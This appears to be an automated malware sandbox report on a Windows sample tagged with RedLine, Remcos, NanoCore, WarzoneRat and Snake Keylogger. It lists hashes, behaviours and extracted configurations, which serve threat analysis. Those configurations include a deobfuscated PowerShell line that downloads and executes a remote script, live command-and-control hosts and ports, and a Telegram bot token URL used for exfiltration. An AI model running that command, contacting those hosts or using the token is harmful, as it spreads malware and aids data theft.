Overview

overview

10

Static

static

3

a.exe

windows10-1703-x64

Resubmissions

13/06/2023, 15:08 UTC

230613-sh5ehagg67 10

12/06/2023, 12:37 UTC

230612-ptx8sacc46 10

09/06/2023, 19:42 UTC

230609-yevzjsea3z 10

08/06/2023, 16:59 UTC

230608-vhg1bahg5z 10

07/06/2023, 18:26 UTC

230607-w3ealaec62 10

07/06/2023, 18:23 UTC

230607-w1vjsseg31 10

06/06/2023, 14:12 UTC

230606-rjb9nsea66 10

05/06/2023, 13:48 UTC

230605-q395dagh57 10

02/06/2023, 11:55 UTC

230602-n3t22sbe8z 10

30/05/2023, 13:02 UTC

230530-p98pfsaa3x 10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    a.bin

  • Size

    5KB

  • Sample

    230607-w3ealaec62

  • MD5

    8ce1f6882edc51f701bbe648e40dd133

  • SHA1

    496b3df4657e9d11df14a8ad267061d97249b511

  • SHA256

    188e97ba18d7394cb3949e66c8aeb062e3ea8675371d0ee2b5126b52366530ae

  • SHA512

    5826ea307fa12db5a8005fae8758314c0810e956ead3504fda7cadaccdbe737d609dfdfdc51996ab2eb350eae20398f8fbb97b16aa01f2af373c1ba20767d7d6

  • SSDEEP

    48:6jtGAK8lb9ivcfaFSfkQLJhyPFlL8thCb/IExQpwOulavTqXSfbNtm:OI0iUaakQqDgtmQpmsvNzNt

Score
10/10
nanocoreredlineremcossnakekeyloggerwarzoneratdizaremotehostsheronevasioninfostealerkeyloggerpersistenceratspywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
1
invoke-expression (new-object net.webclient).downloadstring("https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1")
2
URLs
ps1.dropper

https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1

Extracted

Family

redline

Botnet

diza

C2

83.97.73.129:19068

Attributes
  • auth_value

    0d09b419c8bc967f91c68be4a17e92ee

Extracted

Family

redline

Botnet

sheron

C2

83.97.73.129:19068

Attributes
  • auth_value

    2d067e7e2372227d3a03b335260112e9

Extracted

Family

remcos

Botnet

RemoteHost

C2

pekonomia.duckdns.org:30861

127.0.0.1:55433

185.65.134.166:55433

10.11.0.5:55433

45.128.234.54:55433
Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-B0VP4N

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    Remcos

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Extracted

Family

warzonerat

C2

193.42.32.191:8282

Extracted

Family

nanocore

Version

1.2.2.0

C2

ezemnia3.ddns.net:62335

91.193.75.178:62335
Mutex

954449b5-566c-46fe-92f0-8eb82a7f77b0

Attributes
  • activate_away_mode

    true

  • backup_connection_host

    91.193.75.178

  • backup_dns_server

    8.8.4.4

  • buffer_size

    65535

  • build_time

    2023-01-23T18:14:17.620110936Z

  • bypass_user_account_control

    true

  • bypass_user_account_control_data

  • clear_access_control

    true

  • clear_zone_identifier

    false

  • connect_delay

    4000

  • connection_port

    62335

  • default_group

    Cashout

  • enable_debug_mode

    true

  • gc_threshold

    1.048576e+07

  • keep_alive_timeout

    30000

  • keyboard_logging

    false

  • lan_timeout

    2500

  • max_packet_size

    1.048576e+07

  • mutex

    954449b5-566c-46fe-92f0-8eb82a7f77b0

  • mutex_timeout

    5000

  • prevent_system_sleep

    false

  • primary_connection_host

    ezemnia3.ddns.net

  • primary_dns_server

    8.8.8.8

  • request_elevation

    true

  • restart_delay

    5000

  • run_delay

    0

  • run_on_startup

    false

  • set_critical_process

    true

  • timeout_interval

    5000

  • use_custom_dns_server

    false

  • version

    1.2.2.0

  • wan_timeout

    8000

Extracted

Family

snakekeylogger

C2

https://api.telegram.org/bot6184780923:AAHbCGrBU_2zg9A-73yTyKKCMGf1tkzUFbM/sendMessage?chat_id=759814203

Targets

    • Target

      a.bin

    • Size

      5KB

    • MD5

      8ce1f6882edc51f701bbe648e40dd133

    • SHA1

      496b3df4657e9d11df14a8ad267061d97249b511

    • SHA256

      188e97ba18d7394cb3949e66c8aeb062e3ea8675371d0ee2b5126b52366530ae

    • SHA512

      5826ea307fa12db5a8005fae8758314c0810e956ead3504fda7cadaccdbe737d609dfdfdc51996ab2eb350eae20398f8fbb97b16aa01f2af373c1ba20767d7d6

    • SSDEEP

      48:6jtGAK8lb9ivcfaFSfkQLJhyPFlL8thCb/IExQpwOulavTqXSfbNtm:OI0iUaakQqDgtmQpmsvNzNt

    Score
    10/10
    nanocoreredlineremcossnakekeyloggerwarzoneratdizaremotehostsheronevasioninfostealerkeyloggerpersistenceratspywarestealertrojan

    • NanoCore

      NanoCore is a remote access tool (RAT) with a variety of capabilities.

      keyloggertrojanstealerspywarenanocore

    • RedLine

      RedLine Stealer is a malware family written in C#, first appearing in early 2020.

      infostealerredline

    • RedLine payload

    • Remcos

      Remcos is a closed-source remote control and surveillance software.

      ratremcos

    • Snake Keylogger

      Keylogger and Infostealer first seen in November 2020.

      stealerkeyloggersnakekeylogger

    • Snake Keylogger payload

    • WarzoneRat, AveMaria

      WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

      ratinfostealerwarzonerat

    • Warzone RAT payload

      rat

    • Downloads MZ/PE file

    • Stops running service(s)

      evasion

    • Executes dropped EXE

    • Adds Run key to start application

      persistence

    • Legitimate hosting services abused for malware hosting/C2

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

    behavioral1

MITRE ATT&CK Enterprise v6

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.